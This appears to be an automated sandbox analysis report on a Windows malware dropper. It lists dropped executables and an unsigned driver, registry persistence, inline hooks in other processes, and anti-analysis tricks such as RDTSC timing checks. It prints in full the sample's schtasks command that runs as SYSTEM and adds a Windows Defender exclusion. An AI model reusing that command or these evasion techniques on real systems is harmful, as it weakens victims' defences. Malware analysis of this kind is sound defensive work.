Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: propsys.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dll
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 2873466535874-68348745.02.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2873466535874-68348745.02.exeStatic file information: File size 30940160 > 1048576
Source: 2873466535874-68348745.02.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2873466535874-68348745.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2873466535874-68348745.02.exe
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 9afrYB.exe, 00000006.00000003.2811489429.0000000003E1C000.00000004.00000020.00020000.00000000.sdmp, bmaosk.exe, 00000027.00000000.3016810751.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000028.00000000.3034034590.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000029.00000000.3037274563.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002C.00000002.3060759562.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002C.00000000.3047361403.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 0000002D.00000002.3061535825.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 0000002D.00000000.3048615079.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 0000002E.00000002.3218163778.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 0000002E.00000000.3207402561.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 0000002F.00000002.3221190179.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 0000002F.00000000.3214222156.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5phaM8.exe, 00000030.00000002.3299939275.0000000000928000.00000002.00000001.01000000.0000000E.sdmp, 5phaM8.exe, 00000030.00000000.3291344971.0000000000928000.00000002.00000001.01000000.0000000E.sdmp, 5r1Aib1.exe, 00000031.00000000.3799139729.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000031.00000002.3818367743.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 00000032.00000002.3821962942.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000032.00000000.3804152957.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, 5r1Aib1.exe, 00000035.00000000.4397756084.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, 5r1Aib1.exe, 00000035.00000002.4421264585.0000000000308000.00000002.00000001.01000000.0000000C.sdmp, bmaosk.exe, 00000036.00000002.4423249567.0000000000338000.00000002.00000001.01000000.0000000A.sdmp, bmaosk.exe, 00000036.00000000.4405674251.0000000000338000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 9afrYB.exe, 00000003.00000000.2352915328.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000004.00000002.2375684040.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000004.00000000.2362949280.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe, 00000006.00000000.2613396052.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 9afrYB.exe.0.dr
Source: 2873466535874-68348745.02.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2873466535874-68348745.02.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2873466535874-68348745.02.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2873466535874-68348745.02.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2873466535874-68348745.02.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_000000014000F000
Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
Source: vselog.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x20721
Source: tbcore3U.dll0.6.drStatic PE information: real checksum: 0x0 should be: 0x4ae738
Source: tbcore3U.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x4a5c29
Source: tbcore3U.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x4ab651
Source: kfbe6yYK.exe.39.drStatic PE information: real checksum: 0x0 should be: 0x1903de
Source: 9eYJWFQF.exe.39.drStatic PE information: real checksum: 0x82c43 should be: 0x85dc3
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll0.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll0.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll0.6.drStatic PE information: section name: .mo:
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .1Q[
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .),E
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .sc=
Source: tbcore3U.dll.39.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.39.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.39.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 40_2_00332691 push ecx; ret 40_2_003326A4
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: 41_2_00302691 push ecx; ret 41_2_003026A4
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: 48_2_00922691 push ecx; ret 48_2_009226A4
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0118E037 push esp; retf EBF3h51_2_0118E29C
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0105248C push FFFFFFE9h; iretd 51_2_01052499
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004AEF44 push eax; ret 52_2_004AEF62
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004AF620 push eax; ret 52_2_004AF64E
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .sc= entropy: 7.9046738678249024
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\Documents\9afrYB.exeJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Program Files (x86)\Z93E12i3\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\Documents\9afrYB.exeJump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\5phaM8\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\5phaM8\5phaM8.exeJump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\kfbe6yYK.exeJump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaosk\tbcore3U.dllJump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeJump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeJump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaosk\bmaosk.exeJump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\kfbe6yYK.exeJump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeJump to dropped file
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\TimeProviders\NtpClientJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,3_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 5688 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 5688 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 1600 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 1600 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 6764 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeMemory written: PID: 6764 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1220 base: 10A0005 value: E9 8B 2F E5 75 Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1220 base: 76EF2F90 value: E9 7A D0 1A 8A Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1220 base: 10C0005 value: E9 8B 2F E3 75 Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1220 base: 76EF2F90 value: E9 7A D0 1C 8A Jump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 2800 base: 350005 value: E9 8B 2F BA 76
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 2800 base: 76EF2F90 value: E9 7A D0 45 89
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 2888 base: 12F0005 value: E9 8B 2F C0 75
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 2888 base: 76EF2F90 value: E9 7A D0 3F 8A
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 4296 base: 3B0005 value: E9 8B 2F B4 76
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 4296 base: 76EF2F90 value: E9 7A D0 4B 89
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 3840 base: 11D0005 value: E9 8B 2F D2 75
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 3840 base: 76EF2F90 value: E9 7A D0 2D 8A
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 6500 base: D00005 value: E9 8B 2F 1F 76
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 6500 base: 76EF2F90 value: E9 7A D0 E0 89
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 5448 base: 12A0005 value: E9 8B 2F C5 75
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 5448 base: 76EF2F90 value: E9 7A D0 3A 8A
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeMemory written: PID: 6388 base: 950005 value: E9 8B 2F 5A 76
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeMemory written: PID: 6388 base: 76EF2F90 value: E9 7A D0 A5 89
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 3056 base: 1340005 value: E9 8B 2F BB 75
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 3056 base: 76EF2F90 value: E9 7A D0 44 8A
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 5364 base: 970005 value: E9 8B 2F 58 76
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 5364 base: 76EF2F90 value: E9 7A D0 A7 89
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 5404 base: 2C0005 value: E9 8B 2F C3 76
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeMemory written: PID: 5404 base: 76EF2F90 value: E9 7A D0 3C 89
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1812 base: DF0005 value: E9 8B 2F 10 76
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMemory written: PID: 1812 base: 76EF2F90 value: E9 7A D0 EF 89
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004746A5 IsIconic,Sleep,52_2_004746A5
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D1946 IsWindowVisible,IsIconic,52_2_004D1946
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0046E9D4 __EH_prolog,IsWindow,IsWindow,IsWindowVisible,IsWindow,IsIconic,52_2_0046E9D4
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A6DC1 IsIconic,GetWindowPlacement,GetWindowRect,52_2_004A6DC1
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0045BE4B __EH_prolog,GetClientRect,GetWindowRect,IsIconic,IsWindowVisible,IsWindow,IsWindow,IsWindow,GetNextDlgTabItem,InvalidateRect,52_2_0045BE4B
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004D4165 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,52_2_004D4165
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C4EBC04
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C63CBDE
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C52A03F
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C58080B
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C49DE34
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C672F48
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C687912
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 39340CE
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 397C7B9
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 3D4ED6D
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 3DB01D5
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 39B8F6F
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 3A61246
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 3D2B700
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 3CE0981
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C6682C1
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C545143
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C698092
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE03E38
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDABC04
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BEF1EB4
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C656E74
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C54FFCB
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5787B1
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5CC0AF
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BF16E74
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE387B1
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE8C0AF
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BD5DE34
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BEEA702
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE05143
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5290FC
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C649F9E
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BED5F8C
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDB90FC
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDBA03F
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BEF82C1
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BF28092
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDDFFCB
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE5C0AF
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE12089
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5787AA
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C528B19
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C6891B6
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BDFF34F
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BF27C0E
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BEC1EB4
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BECB056
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BF02F48
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BDAF12B
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BE087B1
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeAPI/Special instruction interceptor: Address: 6BEA5F8C
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BEBA702
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE087AA
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5C183C
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE4F839
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDAF12B
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BE087B1
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C676565
Source: C:\ProgramData\kfbe6yYK.exeAPI/Special instruction interceptor: Address: 11BF4A2
Source: C:\ProgramData\kfbe6yYK.exeAPI/Special instruction interceptor: Address: 1211DE7
Source: C:\ProgramData\kfbe6yYK.exeAPI/Special instruction interceptor: Address: 11B1676
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BD4A702
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BC65143
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BD5CBDE
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BC4A03F
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C543E38
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BCEC0AF
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BDA91B6
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BC3F12B
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeAPI/Special instruction interceptor: Address: 6BCDF839
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C5E8647
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeAPI/Special instruction interceptor: Address: 6C615F8C
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: OutputDebugStringW count: 1924
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeRDTSC instruction interceptor: First address: 14000112D second address: 140001144 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeRDTSC instruction interceptor: First address: 140001144 second address: 140001144 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FDF51092000h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\9afrYB.exeRDTSC instruction interceptor: First address: 4EADA5 second address: 4EADB3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\9afrYB.exeRDTSC instruction interceptor: First address: 3E0B405 second address: 3E0B413 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
